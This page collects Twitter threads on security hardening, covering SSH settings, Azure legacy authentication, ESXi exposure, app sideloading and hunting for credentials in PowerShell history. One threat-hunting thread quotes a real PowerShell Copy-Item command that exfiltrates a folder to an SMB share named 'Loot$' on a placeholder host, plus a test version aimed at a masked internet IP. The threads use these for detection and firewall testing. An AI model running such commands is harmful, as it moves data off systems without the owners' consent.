Discover and read the best of Twitter Threads about #Hardening


1/ #Linux #Hardening

What's your take on setting the value "HashKnownHosts" to yes inside the SSH configuration so that entries in the known_hosts file are hashed? 🧵

#CyberSecurity
2/ Yes, an attacker might find clues about other hosts in the network elsewhere (logs/history files), and yes, a TA can probably crack the hashes relatively quickly with hashcat. [1]
3/ But I would probably vote to enable this setting at the end of the day. You?

Reference:
[1] github.com/chris408/known…
Read 3 tweets
1/ #ThreatHunting

Another one for the people who monitor PowerShell logs or command lines:

Copy-Item -Path "C:\Exfiltration" -Destination "\\X.X.X.X\Loot$" -Recurse

This exfiltration method is from a recent IR case. No need to install anything, just living off the land. 😎
2/ Of course, outgoing SMB traffic must be allowed on the firewall(s).

#Hardening: Using Velociraptor's PowerShell Hunt, we can run the following command on defined (or all) hosts on the network:

Copy-Item -Path "C:\Temp\" -Destination "\\142.93.X.X\c$"
3/ On our specified endpoint on the Internet (with the -Destination parameter), we can capture incoming SMB connections (again, if SMB is not blocked on the FW):

# tcpdump -i eth0 port 445 -nn
IP X.X.X.20.64516 > 142.93.X.X.445
Read 4 tweets
/1 #Hardening:

@0xdf_ finds credentials in the ConsoleHost_history.txt file in the latest walkthrough of the #HTB machine Timelapse. [1]

In our Compromise Assessments, we regularly audit the PowerShell history to find (stored) credentials in this file. 🧵

#CyberSecurity
2/ Hunting for credentials in the PowerShell history is quickly done with @Velocidex Velociraptor.

We can get the file's entire content from the hosts or search specifically for keywords within the file.
3/ The content of this file (the PowerShell history) is not only interesting for searching stored credentials in it but also an excellent forensic artifact.

In the case of a CA, we can specifically search for (older) traces of TAs (Invoke-Commands, downloading of tools/code...).
Read 6 tweets
1/ #Hardening:

If the Windows App sideloading feature is enabled, users can also install APPX packages not originating from the Microsoft Store, ideal for distributing malware with these packages 🤯[1],[2]

🧵 #CyberSecurity
2/ We can search our network for systems with enabled sideloading:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock"
3/ AllowAllTrustedApps:

This value can also be set via GPO if a company wants to distribute trusted line-of-business (LOB) apps that are not from the Windows Store.

However, these apps must still have a valid certificate chain; otherwise, the app will not be loaded.
Read 5 tweets
1/ Linux #Hardening and #ThreatHunting

The screenshot below is from Microsoft [1] - using XorDdos as an example, we can learn a lot about Linux forensics and hardening. 🧵

#CyberSecurity
2/ XorDdos brute-forces (root) access via SSH.

Learning: Prevent logging in via SSH with passwords (use priv/pub keys instead).

Within the SSH config (/etc/ssh/sshd_config), modify at least the following two lines:

PermitRootLogin no
PasswordAuthentication no
3/ SSH can, of course, be secured in much more detail.

DigitalOcean has put together an excellent guide on this topic:

digitalocean.com/community/tuto…
Read 25 tweets
The Most Important PVC in Zero Trust Architecture is People, Also Required for ZTA is the PAM Module in SecHard!

People are one of the most important circles in data security. Research also shows that the vast majority of data leaks result from abuse of employee privileges.
What Threats Might Occur?

Due to the difficulty of identity management, many different types of threats can arise ranging from espionage to ransomware.
Can SecHard Prevent Privilege Abuse?

Unlike a traditional PAM product, SecHard offers a PAM solution that integrates with other PVC areas recommended by the ZTA.
Read 5 tweets
1/ #Azure #Hardening Tip #5: Legacy authentication to bypass MFA in Azure AD

"One of the most common methods used by attackers to gain access to Azure tenants is credential theft or password spraying with legacy authentication protocols. Legacy authentication protocols
2/ do not support MFA and (if enabled) can be used to gain access to hosted data and resources via Azure AD."

☝️Quote from the M-Trends 2022 Report.

A few weeks ago, I created a presentation titled "Attack target Azure", where these two points are also outlined as the most
3/ common methods (used by attackers) into Azure Tenants.

To better secure Azure Tenants, I recommend creating an evaluation of the applications that still use legacy authentication protocols. The use of these protocols should be prevented with Conditional Access Policies (CAP).
Read 6 tweets
1/ #Hardening: More and more attackers in ransomware cases are attacking the ESXi and vCenter infrastructure to encrypt a large part of the systems in a company within a short time.
2/ Once an attacker has gained access to a network, the captured credentials are used for logging into the vCenter infrastructure.

Removing ESXi and vCenter from Active Directory prevents compromised Active Directory accounts from being used to authenticate directly to the
3/ virtualization infrastructure. Authentication would need to happen directly on the relevant systems, and administrators must have dedicated accounts for logging in. These measures cannot prevent compromise but at least make it more
Read 4 tweets